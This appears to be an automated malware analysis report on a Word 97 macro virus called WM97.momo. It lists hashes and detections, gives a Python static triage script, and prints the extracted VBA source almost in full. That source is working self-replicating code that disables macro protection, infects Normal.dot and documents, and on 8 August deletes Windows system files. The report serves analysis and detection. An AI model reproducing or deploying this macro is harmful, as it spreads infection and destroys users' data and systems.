Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fa0c49abe6cfeee0…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 38.0 KB
Created: 1999-10-01 07:33:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: af89f9bdebbeafc00785ff0e3010c547
SHA-1: 0f62d05d76ab775e93acd79c38fd41d8df5b5b5d
SHA-256: fa0c49abe6cfeee090b686bde2c54db2e41c1248ca35efec50d95a231dc2535f
Risk score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

ClamAV flags the sample with multiple signatures: Win.Trojan.Pivis-2 on the document itself and Doc.Trojan.Agnes-3 on the extracted macro source. The VBA project carries a module named "momo" whose comments identify it as WM97.momo, built with "LineZerO's Macro Engine 1.2". It hooks every Word auto-execution event the listing defines (AutoOpen, AutoExit, AutoNew and AutoExec), and each of them calls Bx5405 followed by KiCuQz3859. Bx5405 is the infection routine: it turns off Options.VirusProtection and the Ctrl+Break cancel key, exports the "momo" module to C:\momo.sys, writes an author string and comment assembled from Chr() codes into the document summary information, then imports the module into whichever VBProject lacks it (the active document or Normal.dot), saving the document in .doc format and saving Normal.dot so the module persists across sessions. KiCuQz3859 re-enables auto macros via WordBasic.DisableAutoMacros 0, inserts up to twenty random "Rem" lines into its own code module on every run (a simple polymorphic engine, credited in a comment to "Pyro"), deletes menu items from the View, Format and Tools command bars, and carries a date-triggered payload: on 8 August it sets the user name to "MOMO", cuts the entire document text and saves the emptied document, runs Kill "C:\WINDOWS\SYSTEM\*.*", hides the mouse cursor, calls JoVlLr9070 (which disables the Edit, Insert and Format command bars) and exits Word. Taken together, the auto-execution hooks, the macro-security tampering, the Normal.dot infection and the destructive date trigger identify this as a Word 97 macro virus that spreads by infecting documents and the global template; an infected document arriving as an e-mail attachment is the likely initial vector.
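The Chr()-assembled strings and the capability markers described above can be recovered from the decompressed VBA with a short static triage script. The following is an added example written for this report, not tooling from the analysis pipeline and not code from the sample's author. It embeds a constructed, trimmed excerpt of the extracted macros.bas listing as its input; the capability names, the (month, day) trigger format and the 'malicious'/'review' verdicts are this example's own conventions:

```python
import re
import json

# Constructed excerpt of the extracted macros.bas listing, trimmed to the
# lines that matter for triage. It is a subset of the artifact, not a full copy.
SAMPLE_VBA = r'''
Sub KiCuQz3859()
On Error Resume Next
WordBasic.DisableAutoMacros 0
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
Current.VBProject.VBComponents("momo").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
If Day(Now()) = 8 And Month(Now()) = 8 Then
Kill ("C:\WINDOWS\SYSTEM\*.*")
Call JoVlLr9070
End If
End Sub
Sub Bx5405()
Application.VBE.ActiveVBProject.VBComponents("momo").Export "C:\momo.sys"
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.momo" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
MiRxQx4019JoVlLr4336.VBComponents.Import "C:\momo.sys"
End Sub
Sub AutoOpen()
Call Bx5405
End Sub
Sub AutoExit()
Call Bx5405
End Sub
'''

# Word auto-execution entry points: legacy Auto* names and the Document_* events.
AUTO_EXEC = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+'
    r'(Auto(?:Open|Exec|New|Close|Exit)|Document_(?:Open|Close|New))\s*\(',
    re.I | re.M)

# A concatenation run: Chr()/Chr$() calls or single-line string literals joined by & or +.
TOKEN_SRC = r'Chr\$?\(\s*\d+\s*\)|"[^"\n]*"'
CONCAT_RUN = re.compile(rf'(?:(?:{TOKEN_SRC})\s*[&+]\s*)+(?:{TOKEN_SRC})', re.I)
TOKEN = re.compile(r'Chr\$?\(\s*(\d+)\s*\)|"([^"\n]*)"', re.I)

# Capability markers a macro-virus triage cares about (names are this example's own).
CAPABILITIES = {
    'disables_macro_security': re.compile(r'\.VirusProtection\s*=\s*False|\bDisableAutoMacros\b', re.I),
    'self_modifying_code': re.compile(r'\.CodeModule\.(?:InsertLines|AddFromString|ReplaceLine)\b', re.I),
    'module_export_import': re.compile(r'\.VBComponents(?:\([^)]*\))?\.(?:Export|Import)\b', re.I),
    'destructive_file_op': re.compile(r'\bKill\b', re.I),
}
DATE_TRIGGER = re.compile(
    r'\bDay\s*\(\s*Now\s*\(\s*\)\s*\)\s*=\s*(\d+)\s+And\s+Month\s*\(\s*Now\s*\(\s*\)\s*\)\s*=\s*(\d+)',
    re.I)


def decode_concat_runs(source: str) -> list:
    """Rebuild every string the macro assembles from Chr() codes.

    Byte values are decoded as cp1252, which is how Word on a Western locale
    renders Chr(216); runs made only of literals are skipped."""
    decoded = []
    for run in CONCAT_RUN.finditer(source):
        pieces, saw_chr = [], False
        for tok in TOKEN.finditer(run.group(0)):
            if tok.group(1) is not None:
                saw_chr = True
                n = int(tok.group(1))
                pieces.append(bytes([n]).decode('cp1252', 'replace') if n < 256 else chr(n))
            else:
                pieces.append(tok.group(2))
        if saw_chr:
            decoded.append(''.join(pieces))
    return decoded


def date_triggers(source: str) -> list:
    """Return (month, day) pairs from 'Day(Now()) = d And Month(Now()) = m' checks."""
    return [(int(m), int(d)) for d, m in DATE_TRIGGER.findall(source)]


def triage_vba(source: str) -> dict:
    """Static triage of decompressed VBA source: entry points, capabilities, verdict."""
    findings = {
        'auto_exec_entry_points': sorted({m.group(1) for m in AUTO_EXEC.finditer(source)}, key=str.lower),
        'decoded_strings': decode_concat_runs(source),
        'date_triggers': date_triggers(source),
    }
    for name, pattern in CAPABILITIES.items():
        findings[name] = pattern.search(source) is not None
    hostile = [name for name in CAPABILITIES if findings[name]]
    # Auto-execution plus at least one hostile capability is enough to call it.
    findings['verdict'] = 'malicious' if findings['auto_exec_entry_points'] and hostile else 'review'
    return findings


if __name__ == '__main__':
    print(json.dumps(triage_vba(SAMPLE_VBA), indent=2, ensure_ascii=False))
```

Run it against the full macros.bas dumped by olevba; the patterns only match decompressed VBA source, not the compressed macro stream inside the OLE container. On this excerpt it reports AutoExit and AutoOpen as entry points, decodes the author string to "Jack Twoflower -=[LineZerØ Vx Team]=-" and the comment to "WM97.momo by LiME 1.o", and recovers the (8, 8) trigger. That last finding is the practical caveat: a sandbox run on any day other than 8 August exercises only the infection path and never reaches the Kill, so the destructive behaviour has to come from static reading or from a clock-spoofed detonation.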

Heuristics (4)

  • ClamAV: Win.Trojan.Pivis-2 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The document defines an AutoOpen macro, which Word runs as soon as the document is opened; this sample also defines AutoExec, AutoNew and AutoExit, so the code runs at Word start-up, on new documents and on exit as well
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    Generic rule text: the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the generic text understates the evidence: a VBA project was recovered (macros.bas under Extracted artifacts), and that VBA code itself calls into WordBasic (DisableAutoMacros, FileExit, [FileName$]), a pattern common in Word 97 era macro viruses.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5351 bytes
SHA-256: f2841eb2b722198d8aeee6b3f98820dc38523f0032fe6b6dfd8055d2acb0d6f2
Detection: ClamAV: Doc.Trojan.Agnes-3
Obfuscation or payload: light obfuscation, no embedded payload. The document author and comment strings are assembled from Chr() sequences (Sub Bx5405), subroutine and variable names are randomised, and KiCuQz3859 rewrites its own code module on every run by inserting random Rem lines. The only destructive action is the Kill of C:\WINDOWS\SYSTEM\*.* on the 8 August date trigger; there is no downloader and no dropped executable.
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "momo"
Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Sub KiCuQz3859()

    ' -= [LineZerO's Macro Engine 1.2] =-
    ' -= [WM97.momo] =-

    ' -= [ID: 23451-Bx-54053859-Bm.W] =-

On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
 'This code is taken from Pyro | Thanks
Set Current = MacroContainer
For Grow = 1 To 20
Number = Current.VBProject.VBComponents("momo").CodeModule.ProcCountLines("KiCuQz3859", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("momo").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
Remark = ""
Next Grow
If Day(Now()) = 8 And Month(Now()) = 8 Then
Application.Username = "MOMO"
Selection.Wholestory
Selection.Cut
ActiveDocument.SaveAs ActiveDocument.FullName
Kill ("C:\WINDOWS\SYSTEM\*.*")
While ShowCursor(False) >= 0
Wend
Call JoVlLr9070
WordBasic.FileExit dlg
End If
Application.CommandBars("View").Controls(6).Delete
Application.CommandBars("Format").Controls(12).Delete
Application.CommandBars("Tools").Controls(12).Delete
Application.CommandBars("Tools").Controls(13).Delete
End Sub
Sub JoVlLr9070()
On Error Resume Next
Application.CommandBars("Edit").Enabled = False
Application.CommandBars("Insert").Enabled = False
Application.CommandBars("Format").Enabled = False
End Sub
Sub Bx5405()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.ConfirmConversions = False
End With
Application.VBE.ActiveVBProject.VBComponents("momo").Export "C:\momo.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.momo" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
.Keywords = "LiME ID: 23451-Bx-54053859-Bm.W"
.Execute
End With
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "momo" Then DgDmFu5117PwVzPp5405 = True
Next x
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(y).Name = "momo" Then NhJtFj9070KiCuQz3859 = True
Next y
If DgDmFu5117PwVzPp5405 = True And NhJtFj9070KiCuQz3859 = False Then Set MiRxQx4019JoVlLr4336 = ActiveDocument.VBProject
If DgDmFu5117PwVzPp5405 = False And NhJtFj9070KiCuQz3859 = True Then Set MiRxQx4019JoVlLr4336 = NormalTemplate.VBProject
If DgDmFu5117PwVzPp5405 = True And NhJtFj9070KiCuQz3859 = True Then GoTo Ende_
MiRxQx4019JoVlLr4336.VBComponents.Import "C:\momo.sys"
If NhJtFj9070KiCuQz3859 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
If DgDmFu5117PwVzPp5405 = False Then NormalTemplate.Save
Ende_:
Call KiCuQz3859
End Sub
Sub AutoOpen()
On Error Resume Next
Call Bx5405
Call KiCuQz3859
End Sub
Sub AutoExit()
On Error Resume Next
Call Bx5405
Call KiCuQz3859
End Sub
Sub AutoNew()
On Error Resume Next
Call Bx5405
Call KiCuQz3859
End Sub
Sub AutoExec()
On Error Resume Next
Call Bx5405
Call KiCuQz3859
End Su
... (truncated)